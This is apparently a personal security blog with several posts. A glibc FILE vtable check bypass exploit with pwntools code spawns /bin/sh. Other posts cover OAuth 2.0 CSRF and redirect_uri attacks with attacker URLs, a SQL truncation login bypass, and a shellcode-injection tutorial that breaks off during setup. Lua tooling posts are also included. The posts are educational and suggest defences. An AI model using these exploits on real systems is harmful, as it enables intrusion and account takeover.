Dhaval Kapil

FILE Structure Exploitation ('vtable' check bypass)

2018-01-12T00:00:00+00:00

Introduction

‘FILE’ structure exploitation is one of the common ways to gain control over execution flow. The attacker overwrites a ‘FILE’ pointer (say stdin, stdout, stderr or any other file handler opened by fopen()) to point to his/her own forged structure. This structure contains vtable, which is a pointer to a table which contains functions which are called when the original ‘FILE’ pointer is used to perform different operations (such as fread, fwrite, etc.). However, checks have recently been incorporated in libc that place a restriction on vtable to protect against most of the attacks.

Kees Cook has written an informative article about ‘Abusing the FILE structure’. This technique will no longer work in the patched libc. Another possible way to exploit the ‘FILE’ structure is to forge the read, write pointers instead of the vtable. This technique is highlighted by Angelboy in his presentation: Play with FILE Structure - Yet Another Binary Exploit Technique.

In this post, I’ll be describing the protection mechanism introduced recently in libc and a possible way to bypass it. We’ll not only get RIP control, but also control over the the first three parameters in RDI, RSI and RDX respectively. I’ll be only targeting the vtable pointer.

Prerequisites

It is assumed that the reader is familiar with the current FILE structure and the common (though now obsolete) attack on vtable. The following two resources (same as mentioned previously) are sufficient to get the necessary background:

Protection mechanism

Two new functions have been added to protect against tampering with the vtable pointer: IO_validate_vtable and _IO_vtable_check. Every vtable reference is first passed through IO_validate_vtable (which internally uses _IO_vtable_check). In case tampering is detected, the program aborts, otherwise the corresponding vtable pointer is returned.

/*
  IO_validate_vtable
  Source: https://code.woboq.org/userspace/glibc/libio/libioP.h.html#IO_validate_vtable
 */

/* Perform vtable pointer validation.  If validation fails, terminate
   the process.  */
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  const char *ptr = (const char *) vtable;
  uintptr_t offset = ptr - __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

The function checks whether the vtable pointer lies inside the __libc_IO_vtables section or not. If not, it further check the pointer by calling _IO_vtable_check. This section contains some vtables of the type _IO_jump_t (source). The original vtable is also part of it.

/*
  _IO_vtable_check
  Source: https://code.woboq.org/userspace/glibc/libio/vtables.c.html#_IO_vtable_check
*/

void attribute_hidden
_IO_vtable_check (void)
{
#ifdef SHARED
  void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (flag);
#endif
  if (flag == &_IO_vtable_check)
    return;
  {
    Dl_info di;
    struct link_map *l;
    if (_dl_open_hook != NULL
       || (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0
            && l->l_ns != LM_ID_BASE))
      return;
  }
#else /* !SHARED */
  if (__dlopen != NULL)
    return;
#endif
  __libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");
}

Attack

In this attack, we will make the FILE’s vtable point to some other place (useful), which is already inside the __libc_IO_vtables section. This will pass the security check. I came across this attack while going through a CTF writeup. The _IO_str_jumps is also part of this section (source). It contains a pointer to the function _IO_str_overflow which is useful for our purpose.

/* Source: https://code.woboq.org/userspace/glibc/libio/strops.c.html#_IO_str_overflow
*/

_IO_str_overflow (_IO_FILE *fp, int c)
{
  int flush_only = c == EOF;
  _IO_size_t pos;
  if (fp->_flags & _IO_NO_WRITES)
      return flush_only ? 0 : EOF;
  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
    {
      fp->_flags |= _IO_CURRENTLY_PUTTING;
      fp->_IO_write_ptr = fp->_IO_read_ptr;
      fp->_IO_read_ptr = fp->_IO_read_end;
    }
  pos = fp->_IO_write_ptr - fp->_IO_write_base;
  if (pos >= (_IO_size_t) (_IO_blen (fp) + flush_only))
    {
      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
        return EOF;
      else
    {
      char *new_buf;
      char *old_buf = fp->_IO_buf_base;
      size_t old_blen = _IO_blen (fp);
      _IO_size_t new_size = 2 * old_blen + 100;
      if (new_size < old_blen)
        return EOF;
      new_buf
        = (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);

        /* ^ Getting RIP control !*/

We shall overwrite the vtable in such a manner so that instead of calling the regular ‘FILE’ associated function, _IO_str_overflow would be called. Since we can already forge fp, we can control the execution flow, along with the first three parameters in this line:

(char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);

fp->_s._allocate_buffer is at a fixed offset within fp and new_size is being calculated from the members of fp. The offset can be calculated by reversing the binary or through gdb. In my case, the offset was 0xe0, which is directly after vtable pointer. new_size is calculated as follows:

#define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base)
size_t old_blen = _IO_blen (fp);
_IO_size_t new_size = 2 * old_blen + 100;

Hence, we can craft any ‘even’ value for new_size by setting appropriate _IO_buf_end and _IO_buf_base. For instance, if we want new_size to be equal to x, set _IO_buf_base = 0 and _IO_buf_end = (x - 100)/2. However, we also have to pass a check before arriving at the particular call instruction:

int flush_only = c == EOF;
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (_IO_size_t) (_IO_blen (fp) + flush_only))

flush_only is 0, so we want pos >= _IO_blen(fp). This can be achieved by setting _IO_write_ptr = (x - 100)/2 and _IO_write_base = 0.

Regarding the second and third parameters, let’s reverse the binary at assembly level and trace back the registers rsi and rdx before the call instruction:

mov     rdx, [rdi+28h]
mov     rsi, rdx
sub     rsi, [rdi+20h]

rdi + 0x28 matches with fp->_IO_write_ptr. rdi + 0x20 matches with _IO_write_base. Note that we already have a restriction that _IO_write_ptr - _IO_write_base should be greater than or equal to (rdi - 100)/2. Hence, we cannot have arbitrary values for rsi and rdx.

Now, with this let’s try our own exploit. Consider the vulnerable code:

/* gcc vuln.c -o vuln */

#include <stdio.h>
#include <unistd.h>

char fake_file[0x200];

int main() {
  FILE *fp;
  puts("Leaking libc address of stdout:");
  printf("%p\n", stdout); // Emulating libc leak
  puts("Enter fake file structure");
  read(0, fake_file, 0x200);
  fp = (FILE *)&fake_file;
  fclose(fp);
  return 0;
}

Here is the link to the above mentioned code. You might want to work with the same binary and libc that I used. I am running it on Ubuntu 16.04.

The program first simulates a leak of an address in libc. It then takes input in a global variable fake_file and points the file pointer fp to it. Next, it closes the file pointer using fclose(fp).

The first step towards developing the exploit is to realize the target that we want to achieve. Namely, calling system("/bin/sh"). I shall be using pwntools library. The binary comes with a libc leak, making it easier for us to calculate the address of system and the string /bin/sh within the libc.

rip = libc_base + libc.symbols['system']
rdi = libc_base + next(libc.search("/bin/sh"))

Our next step is to point vtable to some address, such that, fclose will actually call _IO_str_overflow. I used gdb to find the relative offset of a pointer to _IO_str_overflow from _IO_file_jumps, which apparently is 0xd8 for the provided libc. Now, if I point the vtable to 0x10 bytes before it, fclose will call _IO_str_overflow (again from gdb).

io_str_overflow_ptr_addr = libc_base + libc.symbols['_IO_file_jumps'] + 0xd8
# Calculate the vtable by subtracting appropriate offset
fake_vtable_addr = io_str_overflow_ptr_addr - 2*8

Next, we can craft our fake ‘FILE’ structure by setting appropriate vtable and also other pointers so as to call rip with rdi as a parameter.

# Craft file struct
file_struct = pack_file(_IO_buf_base = 0,
                        _IO_buf_end = (rdi-100)/2,
                        _IO_write_ptr = (rdi-100)/2,
                        _IO_write_base = 0,
                        _lock = bin.symbols['fake_file'] + 0x80)
# vtable pointer
file_struct += p64(fake_vtable_addr)
# (*((_IO_strfile *) fp)->_s._allocate_buffer)
file_struct += p64(rip)
file_struct = file_struct.ljust(0x100, "\x00")

Note that we also have to set fp->_lock to an address pointing to NULL to prevent fclose waiting on someone else for releasing the lock. The complete exploit can be downloaded here.

Note: Another possible function (instead of _IO_str_overflow) that one could use is _IO_wstr_finish() as seen in this post by Josh Wang.

Conclusion

Given that an attacker has control over a few fields of the ‘FILE’ structure(for rdi), the vtable pointer and 8 bytes after it (for rip), the additional check on vtable offers not much protection.

Attacking the OAuth Protocol

2017-02-17T00:00:00+00:00

This post is about developing a secure OAuth 2.0 server, the inherent weaknesses of the protocol, and their mitigation.

Introduction

Recently, I had the opportunity to mentor a fellow student at SDSLabs on a project related to the OAuth 2.0 protocol. It was then that I decided to read the official manual for OAuth 2.0. It took me a few hours to go through the entire document and analyze it.

The OAuth 2.0 protocol itself is insecure. The document specifies some security measures that are optional (which boils down to missing for the casual developer). Apart from that, there are additional loopholes as well. Herein, I try to enumerate the various vulnerabilities of the OAuth 2.0 protocol which I found after reading the standard and a couple of online resources. I suggest mitigation to each of these which might be either following the standard strictly or even changing the standard slightly.

This is aimed to benefit both: developers working with OAuth 2.0 as well as security researchers.

Overview

I’ll be assuming that the reader is familiar with the OAuth 2.0 protocol. There are tons of online resources to read up on this. The reader should also be familiar with basic attacks like CSRF, XSS and open redirect. I’ll be mainly focussing on the Authorization code grant and a little on the Implicit grant. As a refresher, these are the steps involved in an Authorization code grant:

The user requests the client to start the authorization process through the user-agent by issuing a GET request. This happens when the user clicks on ‘Connect’/’Sign in with’ button on the client’s website.
The client redirects the user-agent to the authorization server using the following query parameters:
- response_type: code
- client_id: The id issued to the client.
- redirect_uri(optional): The URI where the authorization server will redirect the response to.
- scope(optional): The scope to be requested.
- state(recommended): An opaque value to maintain state between the request and callback.
After the user authenticates and grants authorization for requested resources, the authorization server redirects the user-agent to the redirect_uri with the following query parameters:
- code: The authorization code.
- state: The value passed in the above request.
The client further uses the authorization code to request for an access token(with appropriate client authentication) using the following parameters in the request body:
- grant_type: authorization_code
- code: The authorization code received earlier.
- redirect_uri: The redirect_uri passed in the first request.

Attacks

Now, I’m going to talk about various attacks possible by modifying the above-mentioned requests. I’ll be specifying the assumptions in each of the cases separately.

Attacking the ‘Connect’ request

This attack exploits the first request mentioned above, i.e. the request generated when a user clicks ‘Connect’ or ‘Sign in with’ button. Many websites allow users to connect additional accounts like Google, Facebook, Twitter, etc. using OAuth. An attacker can gain access to the victim’s account on the Client by connecting one of his/her own account(on the Provider).

Steps:

The attacker creates a dummy account with some Provider.
The attacker initiates the ‘Connect’ process with the Client using the dummy account on the Provider, but, stops the redirect mentioned in request 3(in the Authorization code grant flow). i.e. The attacker has granted Client access to his/her resources on the Provider but the Client has not yet been notified.
The attacker creates a malicious webpage simulating the following steps:
- Logging out the user on Provider(using CSRF).
- Logging in the user on Provider with the credentials of his/her dummy account(using CSRF).
- Spoofing the 1st request to connect the Provider account with Client. This can be easily done, as it is just another GET request. It is preferred to do this within an iframe so that the victim is unaware of this.
When the victim visits the attacker’s page, he/she is logged out of Provider and then gets signed in as the dummy account. The ‘Connect’ request is then issued which results in the attacker’s dummy account to be connected with the victim’s account on Client. Note that the victim will not be asked for granting access to the client as the attacker has already approved it in Step 2.
Now, the attacker can log in to the victim’s account on Client by signing in with the dummy account on Provider.

Mitigation

Although the vulnerability exists on the Provider itself(allowing CSRF log in and log out), it is even better to protect the ‘Connect’ page from allowing requests that do not originate from the user. This can be ensured by using a csrf_token within the client to protect the 1st request. The OAuth 2.0 standard should specify this.

Attacking ‘redirect_uri’

Presently, to prevent attackers using arbitrary redirect_uri, many OAuth servers partially match this parameter with a redirect_uri prespecified during client registration. Generally, during registration, the client specifies the domain and only those redirect_uri on that particular domain are allowed. This becomes dangerous when an attacker is able to find a page vulnerable, to say XSS, on the client’s domain. The attacker can subsequently steal authorization_code.

Steps:

The attacker is able to leak data(say through XSS) from a page on the client’s domain: https://client.com/vuln.
The attacker injects Javascript code(if XSS) on that page that sends the URL loaded in the browser(with parameters as well as fragments) to the attacker.
The attacker creates a webpage that forces the user to visit a malicious link such as: https://provider.com/oauth/authorize?client_id=CLIENT_ID&response_type=code&redirect_uri=https%3A%2F%2Fclient.com%2Fvuln
When the victim loads this link, the user-agent is redirected to https://client.com/vuln?code=CODE. This CODE is then sent to the attacker.
The attacker can use this code at his/her end to issue an access token by passing it to the authentic redirect_uri such as https://client.com/oauth/callback?code=CODE.

This attack is even more dangerous if the authorization server supports the Implicit grant. By passing response_type=token, the attacker can steal the token directly.

Mitigation

To prevent the attack for Authorization code grant, OAuth already specifies the following in the standard for an access token request:

The authorization server MUST:

ensure that the “redirect_uri” parameter is present if the “redirect_uri” parameter was included in the initial authorization request as described in Section 4.1.1, and if included ensure that their values are identical.

With this, the attacker will be unable to perform Step 5. The client will request for an access token with authentication_code and authentic redirect_uri which will not match with https://client.com/vuln. Hence, the authorization server will not grant an access token. However, developers rarely take this into consideration. Individually, this does not represent any real threat, but with other vulnerabilities(as mentioned above), this can lead to leaking of access tokens. Note that, this will not prevent attacking authorization servers using Implicit grant.

Another protective measure, which in my opinion is more secure and handles both the above cases is that the authorization server should whitelist a list of redirect_uri. Also, while sanitizing this parameter, exact matches should be made instead of partial matches. Usually, clients have predefined redirect_uri and they rarely need to change them.

CSRF on Authorization response

By performing a Cross Site Request Forgery attack, an attacker can link a dummy account on Provider with victim’s account on Client(as mentioned in the first attack). This attack uses the 3rd request of the Authorization code grant.

Steps:

The attacker creates a dummy account on Provider.
The attacker initiates the ‘Connect’ process with the Client using the dummy account on the Provider, but, stops the redirect mentioned in request 3(in the Authorization code grant flow). i.e. The attacker has granted Client access to his/her resources on the Provider but the Client has not yet been notified. The attacker saves the authorization_code.
The attacker forces the victim to make a request to: https://client.com/<provider>/login?code=AUTH_CODE. This can be easily done by making the victim opening a malicious webpage with any img or script tag with the above URL as src.
If the victim is logged in Client, the attacker’s dummy account is now connected to his/her account.
Now, the attacker can log in to the victim’s account on Client by signing in with the dummy account on Provider.

Mitigation

OAuth 2.0 provides security against such attacks through the state parameter passed in the 2nd and 3rd request. It acts like a CSRF token. The attacker cannot forge a malicious URL without knowing the state which is user session specific. However, in the current implementation of OAuth, this parameter is NOT required and is optional. Developers not well versed with security are susceptible to ignore this.

OAuth 2.0 should force clients to send a state parameter and handle requests that are missing this parameter as ‘error requests’. Proper guidelines should also be given for generating and handling csrf tokens.

Note: Using the state parameter does not prevent the first attack mentioned above(Attacking the ‘Connect’ request).

Reusing an access token - One access_token to rule them all

OAuth 2.0 considers access_token to be independent of any client. All it ensures is that an access_token stored on the authorization server is mapped to appropriate scopes and expiration time. An access token generated for client1 can be used for client2 as well. This poses a danger to clients using the Implicit grant.

Steps:

The attacker creates an authentic client application client1 and registers it with a Provider.
The attacker somehow manages to get the victim use client1. Thereby, he/she has access to the access token of the victim on client1.
Assume that the victim uses client2 which further uses the Implicit grant. In Implicit grant, the authorization server redirects the user-agent to a URL such as: https://client2.com/callback#access_token=ACCESS_TOKEN. The attacker visits this URL with the access_token of the client.
client2 authenticates the attacker as the victim. Hence, a single access token can be used on many different clients that use Implicit grant.

Mitigation

Clients must ensure that the access token being used was indeed issued by them. Some OAuth server like Facebook, provide endpoints to get the __ a particular access_token was issued to: https://graph.facebook.com/app?fields=id&access_token=ACCESS_TOKEN.

Open Redirect in OAuth 2.0

The OAuth 2.0 standard specifies the following guidelines for handling errors in Authorization requests:

If the request fails due to a missing, invalid, or mismatching redirection URI, or if the client identifier is missing or invalid, the authorization server SHOULD inform the resource owner of the error and MUST NOT automatically redirect the user-agent to the invalid redirection URI.

If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the query component of the redirection URI using the “application/x-www-form-urlencoded” format, per Appendix B:

Some OAuth servers, misinterpret this and interchange the order of the two checks. That is, if the request fails for reasons other than redirection URI, such as invalid scope, the server informs the client by redirecting it to the URL passed by the client without validating it. This makes the OAuth server to serve as an open redirector. A possible URL crafted by the attacker can be https://provider.com/oauth/authorize?response_type=code&client_id=CLIENT_ID&scope=INVALID_SCOPE&redirect_uri=http://attacker.com/.

This vulnerability was once present in Facebook, Microsoft, and Google.

Mitigation

The mitigation is trivial: the authorization server should first validate the redirect_uri parameter and continue accordingly.

Conclusion

In short, while developing an OAuth server, security should be kept in mind. Knowledge about various attack vectors is necessary. The OAuth specification should be updated to enforce the appropriate security measures mentioned above. Oauth by Sakurity is a great improvement over OAuth 2.0.

This list is not complete. If you know of any other attacks or even better ways to mitigate the above-mentioned attacks feel free to comment!

SQL Attack (Constraint-based)

2016-12-25T00:00:00+00:00

Introduction

It is good to know that nowadays, developers have started paying attention to security while building websites. Almost everyone is aware of SQL Injection. Herein, I would like to discuss another kind of vulnerability related to SQL databases which is as dangerous as SQL Injection, and yet not as common. I shall demonstrate the attack and discuss various defense strategies.

Disclaimer: This post is NOT about SQL Injection.

Background

Recently, I came across an interesting piece of code. The developer had tried to make every possible attempt to secure access to the database. The following code is run whenever a new user tries to register:

<?php
// Checking whether a user with the same username exists
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);
$query = "SELECT * 
          FROM users 
          WHERE username='$username'";

$res = mysql_query($query, $database);
if($res) { 
  if(mysql_num_rows($res) > 0) {
    // User exists, exit gracefully
    .
    .
  }
  else {
    // If not, only then insert a new entry
    $query = "INSERT INTO users(username, password)
              VALUES ('$username','$password')";
    .
    .
  }
}

To check login, the following code is used:

<?php
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);

$query = "SELECT username FROM users
          WHERE username='$username'
              AND password='$password' ";

$res = mysql_query($query, $database);
if($res) {
  if(mysql_num_rows($res) > 0){
      $row = mysql_fetch_assoc($res);
      return $row['username'];
  }
}
return Null;

Security considerations?

Filter user input parameters? - CHECK
Use single quotes(‘) for additional security? - CHECK

Cool, what could go wrong?

Well, the attacker can log in as ANY user!

The Attack

It is crucial to understand a few points before talking about the attack.

While performing string handling in SQL, whitespace characters at the end of the string are removed. In other words, 'vampire' is treated similarly to 'vampire '. This is true for most of the cases, such as strings in WHERE clause or in INSERT statements. For eg., the following query shall return results with even username as 'vampire'.
```
SELECT * FROM users WHERE username='vampire     ';
```
Exceptions do exist such as the LIKE clause. Note that this trimming of trailing whitespaces is done mostly during ‘string comparison’. This is because, internally, SQL pads one of the strings with whitespaces so that their length matches before comparing them.
In any INSERT query, SQL enforces maximum length constraints on varchar(n) by just using the first ‘n’ characters of the string(in case the length of the string is more than ‘n’ characters). e.g. if a particular column has a length constraint of ‘5’ characters, then inserting ‘vampire’ will result in the insert of only ‘vampi’.

Now, let us setup a testing database to demonstrate the attack.

vampire@linux:~$ mysql -u root -p

mysql> CREATE DATABASE testing;
Query OK, 1 row affected (0.03 sec)

mysql> USE testing;
Database changed

I am going to create a table users with two columns, username and password. Both of these fields will be limited to 25 characters. Next, I will insert a dummy row with ‘vampire’ as the username and ‘my_password’ as the password.

mysql> CREATE TABLE users (
    ->   username varchar(25),
    ->   password varchar(25)
    -> );
Query OK, 0 rows affected (0.09 sec)

mysql> INSERT INTO users
    -> VALUES('vampire', 'my_password');
Query OK, 1 row affected (0.11 sec)

mysql> SELECT * FROM users;
+----------+-------------+
| username | password    |
+----------+-------------+
| vampire  | my_password |
+----------+-------------+
1 row in set (0.00 sec)

To demonstrate the trimming of trailing whitespaces, consider the following query:

mysql> SELECT * FROM users
    -> WHERE username='vampire       ';
+----------+-------------+
| username | password    |
+----------+-------------+
| vampire  | my_password |
+----------+-------------+
1 row in set (0.00 sec)

Now, assume that a vulnerable website uses the earlier mentioned PHP code to handle user registration and login. To break into any user’s account(in this case ‘vampire’), all that is needed to be done is to register with a username ‘vampire[Many whitespaces]1’ and a random password. The chosen username should be such that the first 25 characters should consist only of ‘vampire’ and whitespaces. This will help in bypassing the query which checks whether a particular username already exists or not.

mysql> SELECT * FROM users
    -> WHERE username='vampire                   1';
Empty set (0.00 sec)

Note that while running SELECT queries, SQL does not shorten the string to 25 characters. Hence, the complete string is searched and no result is obtained. Next, when an INSERT query is run, only the first 25 characters are inserted.

mysql>   INSERT INTO users(username, password)
    -> VALUES ('vampire                   1', 'random_pass');
Query OK, 1 row affected, 1 warning (0.05 sec)

mysql> SELECT * FROM users
    -> WHERE username='vampire';
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| vampire                   | my_password |
| vampire                   | random_pass |
+---------------------------+-------------+
2 rows in set (0.00 sec)

Great, now there are two users which will be returned when searching for ‘vampire’. Note that the second username is actually ‘vampire’ plus 18 trailing whitespaces. Now, if logged in with ‘vampire’ and ‘random_pass’, any SELECT query that searches by the username will return the first and the original entry. This will enable the attacker to log in as the original user.

This attack has been successfully tested on MySQL and SQLite. I believe it works in other cases as well.

Defenses

Clearly, this is a major vulnerability and needs to be taken care of while developing secure software. A few of the defense measures that can be taken are as follows:

UNIQUE constraint should be added to columns which are required/expected to be unique. This actually is a very important rule concerning software development. Even if your code tries to maintain integrity, always define your data properly. With a UNIQUE constraint on ‘username’, inserting another entry will not be possible. Both the strings will be detected equal and the INSERT query will fail.
Always prefer using ‘id’ as the primary key for your database table. Also, data should be tracked by their id within the program.
For added security, you can also manually trim input parameters to a particular length(as set in the database).

Elasticsearch Lua II

2016-08-16T00:00:00+00:00

This post is about my GSoC project, that I worked on during summer, 2016. I worked under the LabLua organization on adding a test suite and improving documentation for elasticsearch-lua. elasticsearch-lua.

Introduction

Elasticsearch is a distributed, scalable and full-text search engine based on Lucene. It provides an HTTP web interface and handles JSON documents. It is presently ranked 1 in the category of ‘Search engines’.

elasticsearch-lua is a client for Elasticsearch that provides a wrapper over the REST interface for the Lua Programming Language. I developed it as part of GSoC 2015 with my mentor Pablo Musa.

My GSoC project this year was entitled ‘Improve elasticsearch-lua tests and builds’ and was a continuation of the work that I had done last year. Apart from adding a test suite for elasticsearch-lua and making it robust, I also decided to work on the documentation of the code.

Test suite for elasticsearch-lua

The tests are divided into unit, integration and stress tests. Note that all these tests run for Lua 5.1, 5.2, 5.3 and LuaJIT 2.0. Code coverage is measured for unit tests and integration tests. Coveralls was chosen to measure and maintain code coverage. As of now, around 91% of the code is covered with tests.

Unit Tests

There are many different modules within elasticsearch-lua. For every such module, there is a corresponding unit test written. Unit tests can be found in tests/ directory. Care was taken to test extensively all the endpoints. Some key points to note:

Some modules were ‘mocked’ to intercept external calls.
Not only return values (success or failure) but every internal parameter was ‘deep’ checked. Deep check involves checking each nested parameter recursively. For example, a lua table might have another table inside it.
Travis was chosen for continuous integrations. Everytime code is pushed, a build is triggered on travis and unit tests are run. Success or failure status is reported back.
A number of bugs (pertaining to generating of target url for endpoint, and listing source files in the rockspec file) were found by running the tests. All were fixed.

The diff of changes due to unit tests can be seen here.

Integration Tests

Apart from the test of every component individually, it is equally important that they work together while interacting with each other. To make elasticsearch-lua robust, it was necessary to add some integration tests.

Integration tests involve calling an API function in a real environment and testing parameters at every point. Wrappers for some API functions were developed so as to avoid repeated code.
We believe that using real data for integration tests is always a good practice. Also, the test dataset should stress the system a bit and, thus, it should not be very small. Therefore, we opted by using part of the data available freely from www.githubarchive.org. A mirror is maintained here. The dataset is not a part of the main repository due to size, so it is downloaded on the fly while running tests on travis.
Common operations (such as search, index, get, delete and bulk) were tested in a single run. These operations are intermixed together.

The diff of changes due to integration tests can be seen here.

Stress Tests

Stress tests involve testing elasticsearch-lua limits. By having these tests, the client will be able to prove its stability in an effective manner.

A separate framework for stress testing was designed, considering that it might take a few hours to finish. In short, every successful (unit + integration tests) build triggers a new build, which runs the stress tests, provided that no such build is already running.
The status of stress tests is reported through a separate badge in the README.

The diff of changes due to stress tests can be seen here.

Documentation

Having a good documentation is very important for any library. It helps developers to understand functionalities without having to investigate the code. Moreover, it helps the library adoption as new developers can use it as a guide to get started. Although this was initially not a task for the GSOC project, after realizing its importance, I opted to invest a lot of time in the documentation and added it to the GSoC project timeline.

Guides

The guides consist of documents and tutorials that help developers to install, use and customize elasticsearch-lua. The guides explain the most frequently used functionalities along with some internals. These pages are hosted here.

API Documentation

The API Documentation lists all possible functions provided by the elasticsearch-lua. Each function name is accompanied by the parameters that it accepts. The API documentation is published here.

The diff of changes pertaining to documentation can be seen here.

Additional tasks (Not part of GSoC)

Apart from the tasks mentioned above, I worked on the following as well:

Luaver

While working with elasticsearch-lua, I had to frequently switch between different versions of lua while developing the test suite. Switching is not simple and I faced the following issues often:

Building different lua versions required some effort such as downloading the version source, unzipping, installing and managing any dependency faced. Also, the previous version had to be deleted completely in order to avoid any ambiguity.
Luarocks installation depends on the Lua version. Switching lua versions can mess up the installed rocks.
To solve these issues I used workaround methods, such as editing the source code of some existing rocks.
Sometimes, these code changes broke the entire rock. In such cases, I had to remove all existing rocks, rebuild luarocks and then reinstall the needed rocks.

As I was already familiar with NodeJS and Ruby and understood how such problems were addressed by nvm and rvm, I decided to create a similar tool for lua, and that is how luaver was born.

I also wrote a separate blog post about luaver and you can support the project here. Initially, I didn’t expect to spend much time on it and figured that I could manage both GSoC and develop luaver simultaneously. However, at some point in time, I got too involved in luaver which resulted in me getting one week behind the timeline that I had proposed for GSoC. Nevertheless, I covered it up soon.

Updating elasticsearch-lua

It is important that the client implements all the features provided by Elasticsearch. Also, Elasticsearch is evolving a lot and releasing in a fast pace, so it is important that clients are also up-to-date. Some features were missing and the client version was 1.6 while Elasticsearch is in 2.3. Therefore, I decided to update existing features and implement some missing features.

Benefits of working on the same project for two consecutive years

I myself had written the client. The codebase was already at my finger-tips. I could spend more time working than understanding and getting comfortable with the code.
I wanted to further consolidate my client and make it stable. I couldn’t get much time during the rest of the year to work full-fledged on the development. Google Summer of Code offered a nice incentive.
I had already worked with the Lua community. Being in familiar environment, I was able to work and think freely. luaver was created to benefit the open source Lua community. If this was my first time I wouldn’t even have thought about developing it.

Lua Version Manager

2016-07-03T00:00:00+00:00

This post is about installing and maintaining multiple versions of Lua, LuaJIT, and Luarocks using luaver. This is perhaps the easiest and the most systematic way to go about installing any of the above.

Introducing Lua Version Manager (luaver)

Lua Version Manager or luaver allows you to easily install and switch between multiple versions of lua, luajit, and luarocks in a seamless and consistent manner. The source code is on Github.

Motivation

I was working on a few projects involving lua such as elasticsearch-lua and the sailor web framework. Therein, I frequently had to shift between different versions of Lua to manage dependencies as well as for testing purposes. The following issues motivated me to create luaver:

Building different lua versions required some effort as I had to frequently shift between them.
Luarocks installation depends on the Lua version. Switching lua versions can mess up the installed rocks.
To solve these issues I used workaround methods such as editing the source code of some existing rocks.
Sometimes, these code changes broke the entire rock. In such cases, I had to remove all existing rocks, rebuild luarocks and then reinstall the needed rocks.

I was already familiar with NodeJS and Ruby and understood how such problems were addressed by nvm and rvm.

Installing Lua, LuaJIT, Luarocks with luaver

Using luaver it is very easy to install Lua, LuaJIT or Luarocks. It works by modifying your environment variables. Hence, every terminal session can have a separate environment.

Installing luaver

First of all, you would need to install luaver itself.

curl https://raw.githubusercontent.com/DhavalKapil/luaver/master/install.sh -o install.sh && . ./install.sh

You might need to manually setup a ~/.bashrc or ~/.zshrc file.

Installing Lua

To install lua you can simply specify the version you want to install:

luaver install 5.3.1  # Installs lua-5.3.1

Verify your installation by running:

lua -v

You might need to install libreadline-dev as a dependency for lua. To install older 32-bit lua versions on 64-bit machines, you will require some additional header files. You can get them by installing lib32ncurses5-dev.

Installing LuaJIT

luaver install-luajit 2.0.2  # Installs luajit-2.0.2

Installing Luarocks

luaver install-luarocks 2.3.0  # Installs luarocks-2.3.0

Switching between versions

You can easily switch between different versions:

luaver use 5.3.2           # Switches to lua version 5.3.2
luaver use-luajit 2.0.0    # Switches to luajit version 2.0.0
luaver use-luarocks 2.3.0  # Switches to luarocks version 2.3.0

The switch will be instantaneous and without any glitches. Consistency will be maintained between lua and luarocks. Rocks are installed separately for different versions of luarocks and lua.

Setting default version

You can also set default version of lua, luajit and luarocks that will be active whenever you start a new terminal session.

luaver set-default 5.3.2           # Set lua-5.3.2 as the default version
luaver set-default-luajit 2.0.0    # Set lua-2.0.0 as the default version
luaver set-default-luarocks 2.3.0  # Set lua-2.3.0 as the default version

Listing all installed versions

luaver list           # Lists all installed lua versions
luaver list-luajit    # Lists all installed luajit versions
luaver list-luarocks  # Lists all installed luarocks versions

Getting currently used versions of Lua, LuaJIT, Luarocks

The following command will give you the currently used versions:

luaver current

For complete usage run:

luaver help

Facing any issue?

If you face any issue don’t hesitate to file an issue on the Github repository.

Any suggestions, improvements?

luaver is still in its early stages. Feel free to submit a pull request! However if you are planning on some big thing, do discuss it beforehand.

Shellcode Injection

2015-12-26T00:00:00+00:00

Introduction

Here I am going to demonstrate how to gain shell access by overflowing a vulnerable buffer. I shall show it with both ASLR disabled as well as ASLR enabled(for those who don’t know about ASLR, I’ll come to it soon). This post is in continuation with ‘Buffer Overflow Exploit’, which I wrote earlier. You need not go through it if you’re familiar with it.

Prerequisites:

I expect you to have some basic knowledge about C, gcc, command line and x86 assembly. There are plenty of online sources available for them. Apart from that, you should know about the memory layout of a C program and some idea about overflowing the buffer. In case you are not familiar, I suggest reading my earlier blog post.

Scenario:

You have access to a system with an executable binary that is owned by root, has the suid bit set, and is vulnerable to buffer overflow. We will now exploit it to gain shell access. To learn more about the suid bit see this

Setting up the environment:

First create a user test without root privilages:
```
[sudo] adduser test
```

Create vuln.c in the home directory for test user.

#include <stdio.h>
#include <string.h>

void func(char *name)
{
    char buf[100];
    strcpy(buf, name);
    printf("Welcome %s\n", buf);
}

int main(int argc, char *argv[])
{
    func(argv[1]);
    return 0;
}

Here is the link to the above mentioned code.

Note: You might need sudo while accessing the home directory for test user.

Let’s compile it.

For 32 bit systems
```
[sudo] gcc vuln.c -o vuln -fno-stack-protector -z execstack
```
For 64 bit systems
```
[sudo] gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
```
-fno-stack-protector disabled the stack protection. Smashing the stack is now allowed. -m32 made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32-bit binaries on 64-bit machines. -z execstack makes the stack executable(we’re going to run the shellcode right?). You can download the binary generated on my machine here.

Setting up permissions

[sudo] chown root:test vuln
[sudo] chmod 550 vuln
[sudo] chmod u+s vuln

